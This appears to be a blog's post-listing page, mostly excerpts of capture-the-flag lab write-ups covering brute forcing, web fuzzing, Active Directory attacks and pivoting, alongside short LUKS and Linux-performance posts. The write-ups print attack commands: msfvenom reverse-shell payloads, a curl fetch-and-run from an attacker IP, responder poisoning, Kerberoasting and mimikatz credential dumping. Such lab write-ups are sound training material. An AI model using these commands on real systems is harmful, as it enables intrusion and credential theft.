Posts on Vamsi200 Blog

Linux Perf Analysis - Quickly Check Your Systems Health

Sat, 21 Mar 2026 20:14:58 +0530

Introduction

I’ve been using linux for a while(almost ten years), In the early days, I used to have this very cheap and slow puter. I always used to wonder why the hell it is so slow all of a sudden, since I was new to linux and have been a windows user previously I had no idea how to even open terminal and check what’s wrong. Eventually I ofcourse learned through tutorials and all… Uhmm, well that’s the intro man, I have nothing to say anymore. Let’s just go straight into schize.

Explaining FKeylogger: The Rationale Behind Linux Keylogger Detection

Thu, 21 Aug 2025 20:14:58 +0530

Intro

Keyloggers on Linux are pretty rare - I guess, but they still exist. Are they easy to detect? Well… maybe, maybe not. It really depends on the adversary and how much effort this guy put to hide it. Anyway, I built this project because at some point I decided, “Let’s build a tool to detect them” - and here we are - Github link

Skills Assessment 1&2 Login Brute Forcing

Thu, 27 Feb 2025 23:50:05 +0530

We were given the username & password wordlists, so let’s use them:

hydra -L <username wordlist> -P <password wordlist> <ip> http-get / -s <port>

When we login using the credentials that we found we find the username:

Skills Assessment Part 2

Question 1 - What is the username of the ftp user you find via brute-forcing?

we know the username, I ran a nmap scan and found ssh running.. so let’s crack it with the given wordlist.

Skills Assessment Web Fuzzing

Mon, 24 Feb 2025 23:56:47 +0530

Question 1 - Run a sub-domain/vhost fuzzing scan on ‘*.academy.htb’ for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name)

Well this is straight forward, let’s use subdomains-top1million-5000.

Don’t forget to add ip in your hosts file.

ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:<port>/ -H 'Host: FUZZ.academy.htb'

Question 2 - Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?

Okay, Let’s use web-extensions.txt wordlist, pretty straight-forward.

I tried fuzzing on 3 different vhosts that we found, and we got our answer.

ffuf -w /opt/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:43252/indexFUZZ

Question 3 - One of the pages you will identify should say ‘You don’t have access!’. What is the full page URL?

We have to fuzz on all of our vhosts with recursion and the extensions that we just found.

Skills Assessment Using Web Proxies

Thu, 20 Feb 2025 23:07:18 +0530

Question 1 - The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

First make sure to enable Intercept responses and make it to POST request.
Now Forward the request.
In Response tab, remove the disabled and forward it (Going back to your browser, you can click on button which reveals the flag, don’t forget to turn Intercept off) or send it to repeater tab and click on send, which would reveal the flag.

Hitting /admin.php, we get the cookie. Which then can be sent to Decoder: cookie -> decode as ASCII Hex -> reveals base64 -> decode as base64 -> flag(31 chars value)

Using Intruder, In Payload Processing, we first add our 31 chars value as prefix and Add Base64-encode, ASCII Hex encode.
Now Let’s Load the alphanum-case.txt file. And start attack.
We can one of the request’s responses to get the flag.

Question 4 - You are using the ‘auxiliary/scanner/http/coldfusion_locale_traversal’ tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the ‘XXXXX’ directory being called in ‘/XXXXX/administrator/..’?

Using Metasploit with auxiliary/scanner/http/coldfusion_locale_traversal

AD Enumeration & Attacks Skills Assessment Part II

Wed, 19 Feb 2025 22:31:53 +0530

Question 1 - Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

When I first read the Question, my first thought was LLMNR/NBT-NS Poisoning, because of the title that we have in HTB modules(foothold) :), so I ran responder & got the user and hash :
```
sudo responder -I ens224
```

Question 2 - What is this user’s cleartext password?

Cracking the hash with hashcat, we got the password.

Question 3 - Submit the contents of the C:\flag.txt file on MS01.

We need to first find the IP of MS01, let’s first run fping to get all the Ip’s that are active.
```
fping -asgq 172.16.7.0/23
```

I ran a nmap scan on the Targets and found 172.16.7.50 is MS01, so I initially ran crackmapexec to check if our credentials that we just found are useful.

We can use winrm to login and get the flag

Question 4 & 5 - Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain & What is this user’s password?

I wanted to use login using xfreerdp, so that I can easily transfer tools.. I used ssh tunneling to achieve that :
```
ssh -D 9050 <user>@<ip>
```

change/add the proxychains config to use socks4

AD Enumeration & Attacks Skills Assessment Part I

Sat, 15 Feb 2025 11:40:27 +0530

Initial Access

Reconnaissance

Given the Scenario, we get the user admin and the password My_W3bsH3ll_*********, so we login with the credentials:

Question 1 - Submit the contents of the flag.txt file on the administrator Desktop of the web server

Well, seems that we can access the contents of the Administrator Desktop, so I just grabbed the flag
```
type C:\Users\Administrator\Desktop\flag.txt
```

Reverse Shell Using Metasploit

Payload Generation

msfvenom -p windows/x64/meterpreter/reverse_https lhost=<attacker_ip> -f exe -o payload.exe lport=4444

Metasploit Listener Configuration

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.10.15.161
set LPORT 4444

Payload Delivery And Execution
```
python3 -m http.server
```

using curl to download and executing the payload

curl 10.10.15.161:8000/payload.exe -o payload.exe
./payload.exe

Got the Shell

Question 2 - Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

Enumerating SPNs with setspn.exe¹
```
setspn.exe -Q */*
```

We got our answer that is - s*****l

Question 3 - Crack the account’s password. Submit the cleartext value.

To get the password we can use PowerView, We can use same method, by running a python server and curl it :
Now to import the file we run :
```
Import-Module .\PowerView.ps1
```

Now that we have it imported, we run to the get the SPN Ticket ²:

Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat

Nice! we got the hash, lets crack it using Hashcat, which gives us the password lu***7:
```
hashcat -m 13100 svc_sql_hash /usr/share/wordlists/rockyou.txt
```

Question 4 - Submit the contents of the flag.txt file on the Administrator desktop on MS01

Before we proceed, Let’s first get the IP of MS01 by pinging it.. which reveals - 172.16.6.**

Encrypting Partitions with LUKS using cryptsetup: A Guide

Tue, 28 Jan 2025 14:50:56 +0530

Prerequisites

Administrative (sudo) privileges
A backup of any existing data on the target partition
The partition you want to encrypt (in this guide, we’ll use /dev/sdb2)

Installing cryptsetup

Choose the appropriate command for your distribution:

For Debian/Ubuntu:

sudo apt-get install cryptsetup

For distributions using pacman:

sudo pacman -Sy cryptsetup

Encryption Process

1. Initialize LUKS Encryption

⚠️ WARNING: Before we proceed, please make sure you have a BACKUP OF THE DATA somewhere.

Pivoting, Tunneling, and Port Forwarding - Skill Assessment

Tue, 21 Jan 2025 20:14:58 +0530

Initial Access

Reconnaissance

As from the objectives of the assessment, we start from the webshell, found two user accounts in the /home directory:

Webadmin: Primary target for initial access
Administrator: Potential privilege escalation target
Only webadmin was accessible

Critical Findings

A private SSH key belonging to the webadmin user
A file named “for-admin-eyes-only” containing credentials

Reverse Shell Using Metasploit

Payload Generation

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> -f elf -o payload LPORT=8080

Payload Delivery
```
python3 -m http.server
```

Metasploit Listener Configuration

use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 8080
set payload linux/x64/meterpreter/reverse_tcp

Network Enumeration

Network Discovery

Performed ping sweep and found the internal IP 172.16.5.35:
```
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
```

Dynamic Tunneling Using SSH

As We found the private key to webadmin, we can Dynamic Port Forward using ssh(or use Metasploit as an Socks Proxy):
```
ssh -i id_rsa -D 9050 webadmin@<target_ip>
```

Lateral Movement

Used Proxychains to login with discovered credentials

Located first flag

Privilege Escalation

Next the question was what user was vulnerable?, We can tell the user ‘vfrank’(I just checked the users folder, so I just submitted it as user), now we have to how this user is vulnerable.. well one obvious answer would be active directory(LSASS) so I just copied mimikatz and ran it.
```
privilege::debug
sekurlsa::logonpasswords
```
Confirmed vulnerable user account: vfrank
Successfully extracted cleartext passwords

Network Enumeration

Scanned for additional systems:

for /L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"

Located target IP: 172.16.6.25
Established RDP connection with the credentials.

Final Access

Flag Retrieval

Located flag in C:\

Domain Controller Access

Successfully identified the domain controller
Retrieved the final flag

Posts on Vamsi200 Blog

Linux Perf Analysis - Quickly Check Your Systems Health

Introduction

Explaining FKeylogger: The Rationale Behind Linux Keylogger Detection

Intro

Skills Assessment 1&2 Login Brute Forcing

Question 1 - What is the password for the basic auth login?

Question 2 - After successfully brute forcing the login, what is the username you have been given for the next part of the skills assessment?

Skills Assessment Part 2

Question 1 - What is the username of the ftp user you find via brute-forcing?

Skills Assessment Web Fuzzing

Question 1 - Run a sub-domain/vhost fuzzing scan on ‘*.academy.htb’ for the IP shown above. What are all the sub-domains you can identify? (Only write the sub-domain name)

Question 2 - Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?

Question 3 - One of the pages you will identify should say ‘You don’t have access!’. What is the full page URL?

Skills Assessment Using Web Proxies

Question 1 - The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.

Question 2 - The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer.

AD Enumeration & Attacks Skills Assessment Part II

Question 1 - Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

Question 2 - What is this user’s cleartext password?

Question 3 - Submit the contents of the C:\flag.txt file on MS01.

Question 4 & 5 - Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain & What is this user’s password?

AD Enumeration & Attacks Skills Assessment Part I

Initial Access

Reconnaissance

Question 1 - Submit the contents of the flag.txt file on the administrator Desktop of the web server

Reverse Shell Using Metasploit

Question 2 - Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

Question 3 - Crack the account’s password. Submit the cleartext value.

Question 4 - Submit the contents of the flag.txt file on the Administrator desktop on MS01

Encrypting Partitions with LUKS using cryptsetup: A Guide

Prerequisites

Installing cryptsetup

Encryption Process

1. Initialize LUKS Encryption

Pivoting, Tunneling, and Port Forwarding - Skill Assessment

Initial Access

Reconnaissance

Critical Findings

Reverse Shell Using Metasploit

Network Enumeration

Network Discovery

Dynamic Tunneling Using SSH

Lateral Movement

Privilege Escalation

Network Enumeration

Final Access

Flag Retrieval

Domain Controller Access